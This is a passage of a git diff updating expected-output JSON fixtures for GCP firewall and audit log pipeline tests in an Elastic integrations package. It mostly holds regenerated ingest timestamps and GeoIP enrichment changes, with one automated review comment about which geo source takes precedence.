\\\"system:authenticated\\\"\"},\"logName\":\"projects/elastic-siem/logs/cloudaudit.googleapis.com%2Fdata_access\",\"operation\":{\"first\":true,\"id\":\"03adfb9f-71a3-4f41-9701-29b5542f4d22\",\"last\":true,\"producer\":\"k8s.io\"},\"protoPayload\":{\"@type\":\"type.googleapis.com/google.cloud.audit.AuditLog\",\"authenticationInfo\":{\"principalEmail\":\"system:serviceaccount:kube-system:generic-garbage-collector\"},\"authorizationInfo\":[{\"granted\":true,\"permission\":\"io.k8s.get\",\"resource\":\"api/v1\"}],\"methodName\":\"io.k8s.get\",\"requestMetadata\":{\"callerIp\":\"::1\",\"callerSuppliedUserAgent\":\"kube-controller-manager/v1.19.8 (linux/amd64) kubernetes/4f6f69f/system:serviceaccount:kube-system:generic-garbage-collector\"},\"resourceName\":\"api/v1\",\"serviceName\":\"k8s.io\",\"status\":{}},\"receiveTimestamp\":\"2021-04-29T08:23:19.71757101Z\",\"resource\":{\"labels\":{\"cluster_name\":\"analysis-cluster\",\"location\":\"us-central1-a\",\"project_id\":\"elastic-siem\"},\"type\":\"k8s_cluster\"},\"timestamp\":\"2021-04-29T08:23:18.899153Z\"}", "id": "03adfb9f-71a3-4f41-9701-29b5542f4d22", "kind": "event", diff --git a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json index 8448cb23c6b..11f9e683531 100644 --- a/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json +++ b/packages/gcp/data_stream/firewall/_dev/test/pipeline/test-firewall.log-expected.json 
@@ -96,7 +96,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705390900Z", + "ingested": "2021-12-14T14:43:24.666221289Z", "original": "{\"insertId\":\"1dobeotg13df9f5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.142.0.10\",\"src_port\":57794},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"12345667\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -201,7 +201,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705396900Z", + "ingested": "2021-12-14T14:43:24.666223692Z", "original": "{\"insertId\":\"1dobeotg13df9f7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.128.0.10\",\"dest_port\":57794,\"protocol\":6,\"src_ip\":\"10.142.0.16\",\"src_port\":80},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"local-test\",\"region\":\"us-central1\",\"vm_name\":\"local-adrian-test\",\"zone\":\"us-central1-a\"},\"remote_instance\":{\"project_id\":\"remote-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_vpc\":{\"project_id\":\"remote-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"mysubnet\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-06T16:41:45.009675991Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"892378332\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-06T16:41:38.394575419Z\"}", "kind": "event", "action": "firewall-rule", @@ -216,8 +216,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 53, 
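Review bot: In the `@@ -216,8 +216,16 @@` hunk the expected `destination.geo` for 67.43.156.13 flips from the log-supplied `continent_name: "America"` / `country_name: "usa"` (which the same event's `original` still carries under `remote_location`) to the test database's Bhutan/BT entry, so the IP-based geo lookup in the pipeline presumably now overwrites the location GCP itself reported; the same replacement appears in the `@@ -1379,8 +1387,16 @@` and `@@ -1471,8 +1487,16 @@` hunks. Whether the GeoIP enrichment or the `remote_location` block should win is a pipeline decision rather than a fixture one, and an analyst triaging a denied egress connection now sees only one of the two sources, with the other buried in `event.original`. Since the pipeline is not part of this diff, the intended precedence should at least be recorded beside the geo step, e.g. `// destination.geo comes from the GeoIP lookup and overrides jsonPayload.remote_location`, or the pipeline should keep both (for instance by only running the lookup when `remote_location` is absent). The `event.ingested` rewrites in every hunk of this file are regeneration noise that makes this behavioral change easy to miss in review.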
@@ -293,7 +301,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705405800Z", + "ingested": "2021-12-14T14:43:24.666224234Z", "original": "{\"insertId\":\"4zuj4nfn4llkb\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":53,\"protocol\":17,\"src_ip\":\"10.128.0.16\",\"src_port\":60094},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:35:24.466374097Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:35:17.214711274Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -388,7 +396,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705412100Z", + "ingested": "2021-12-14T14:43:24.666224663Z", "original": "{\"insertId\":\"1f21ciqfpfssuo\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.2\",\"dest_port\":3389,\"protocol\":6,\"src_ip\":\"192.168.2.126\",\"src_port\":64853},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-windows\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"Asia\",\"country\":\"omn\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"3389\"]}],\"priority\":1000,\"reference\":\"network:windows-isolated/firewall:windows-isolated-allow-rdp\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow-rdp\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"windows-isolated\",\"vpc_name\":\"windows-isolated\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-10-30T13:52:54.473174731Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"3238409883146034900\",\"subnetwork_name\":\"windows-isolated\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-10-30T13:52:42.191988835Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -486,7 +494,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705417200Z", + "ingested": "2021-12-14T14:43:24.666225085Z", "original": "{\"insertId\":\"8vcfeailjd\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.219\",\"src_port\":2897},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Krasnodar\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Krasnodar Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:31:22.738796433Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:31:19.421478847Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -582,7 +590,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705423Z", + "ingested": "2021-12-14T14:43:24.666225507Z", "original": "{\"insertId\":\"1bqgmw9feiabij\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:35.727004321Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:31.079508196Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -678,7 +686,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705428700Z", + "ingested": "2021-12-14T14:43:24.666225899Z", "original": "{\"insertId\":\"1jrxaqbfe48bir\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.14\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"Europe\",\"country\":\"deu\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:41:40.791816098Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:41:34.190831607Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -776,7 +784,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705434Z", + "ingested": "2021-12-14T14:43:24.666226307Z", "original": "{\"insertId\":\"1fw7drlfe2ty27\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.151\",\"src_port\":62551},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Berdychiv\",\"continent\":\"Europe\",\"country\":\"ukr\",\"region\":\"Zhytomyr Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:48:47.038820509Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:48:41.449552758Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -874,7 +882,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705438700Z", + "ingested": "2021-12-14T14:43:24.666226693Z", "original": "{\"insertId\":\"1yre751fekaxzs\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.241\",\"src_port\":44542},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Vicenza\",\"continent\":\"Europe\",\"country\":\"ita\",\"region\":\"Veneto\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:10:30.804549999Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:10:24.214995318Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -972,7 +980,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705444400Z", + "ingested": "2021-12-14T14:43:24.666227094Z", "original": "{\"insertId\":\"5kanfzfiqepkh\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":41293},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Tula\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Tula Oblast\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:35:28.934918322Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:35:23.504719962Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1070,7 +1078,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705448500Z", + "ingested": "2021-12-14T14:43:24.666227493Z", "original": "{\"insertId\":\"59z0t8fiow9vg\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.251\",\"src_port\":59106},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Stavropol\",\"continent\":\"Europe\",\"country\":\"rus\",\"region\":\"Stavropol Krai\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T13:36:54.238077643Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T13:36:52.135887769Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1168,7 +1176,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705453300Z", + "ingested": "2021-12-14T14:43:24.666228300Z", "original": "{\"insertId\":\"1y7e4yzff816cq\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:26.357446279Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:16.59353182Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1266,7 +1274,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705459100Z", + "ingested": "2021-12-14T14:43:24.666228695Z", "original": "{\"insertId\":\"lx5jlsfggpr0q\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"192.168.2.189\",\"src_port\":61000},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"Violès\",\"continent\":\"Europe\",\"country\":\"fra\",\"region\":\"Provence-Alpes-Côte d'Azur\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:06:28.203068653Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:06:22.930570324Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1364,7 +1372,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705567900Z", + "ingested": "2021-12-14T14:43:24.666229090Z", "original": "{\"insertId\":\"18ynfbufer19m1\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.28.0.16\",\"dest_port\":8080,\"protocol\":6,\"src_ip\":\"192.168.2.200\",\"src_port\":42716},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"city\":\"İzmir\",\"continent\":\"Asia\",\"country\":\"tur\",\"region\":\"İzmir\"},\"rule_details\":{\"action\":\"DENY\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"80\",\"8080\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-3\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T14:32:14.038485761Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T14:32:07.407039908Z\"}", "kind": "event", "action": "firewall-rule", @@ -1379,8 +1387,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 80, 
@@ -1456,7 +1472,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705590600Z", + "ingested": "2021-12-14T14:43:24.666229470Z", "original": "{\"insertId\":\"tzddthfsr6fv5\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":6,\"src_ip\":\"10.28.0.16\",\"src_port\":46418},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:41:28.971534988Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:41:20.972747063Z\"}", "kind": "event", "action": "firewall-rule", @@ -1471,8 +1487,16 @@ }, "destination": { "geo": { - "continent_name": "America", - "country_name": "usa" + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 }, "address": "67.43.156.13", "port": 80, 
@@ -1548,7 +1572,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705596600Z", + "ingested": "2021-12-14T14:43:24.666229864Z", "original": "{\"insertId\":\"1k2b7kefsnhzq7\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":80,\"protocol\":17,\"src_ip\":\"10.28.0.16\",\"src_port\":58725},\"disposition\":\"DENIED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-central1\",\"vm_name\":\"adrian-test\",\"zone\":\"us-central1-a\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"rule_details\":{\"action\":\"DENY\",\"destination_range\":[\"8.8.8.0/24\"],\"direction\":\"EGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"ALL\"}],\"priority\":1000,\"reference\":\"network:default/firewall:adrian-test-1\",\"target_tag\":[\"adrian-test\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-12T12:42:33.671883883Z\",\"resource\":{\"labels\":{\"location\":\"us-central1-a\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"1266623735137648253\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-12T12:42:26.50532921Z\"}", "kind": "event", "action": "firewall-rule", 
@@ -1656,7 +1680,7 @@ } }, "event": { - "ingested": "2021-12-09T13:37:43.705601100Z", + "ingested": "2021-12-14T14:43:24.666230420Z", "original": "{\"insertId\":\"1sdfuwxfk8hq1c\",\"jsonPayload\":{\"connection\":{\"dest_ip\":\"10.42.0.10\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"192.168.2.114\",\"src_port\":44666},\"disposition\":\"ALLOWED\",\"instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-es\",\"zone\":\"us-east1-b\"},\"remote_instance\":{\"project_id\":\"test-beats\",\"region\":\"us-east1\",\"vm_name\":\"test-kibana\",\"zone\":\"us-east1-b\"},\"remote_location\":{\"continent\":\"America\",\"country\":\"usa\"},\"remote_vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"rule_details\":{\"action\":\"ALLOW\",\"direction\":\"INGRESS\",\"ip_port_info\":[{\"ip_protocol\":\"TCP\",\"port_range\":[\"9200\"]}],\"priority\":1000,\"reference\":\"network:default/firewall:allow9200\",\"source_range\":[\"0.0.0.0/0\"],\"target_tag\":[\"allow9200\"]},\"vpc\":{\"project_id\":\"test-beats\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"}},\"logName\":\"projects/test-beats/logs/compute.googleapis.com%2Ffirewall\",\"receiveTimestamp\":\"2019-11-11T12:54:15.188832255Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"test-beats\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-11-11T12:54:13.531819246Z\"}", "kind": "event", "action": 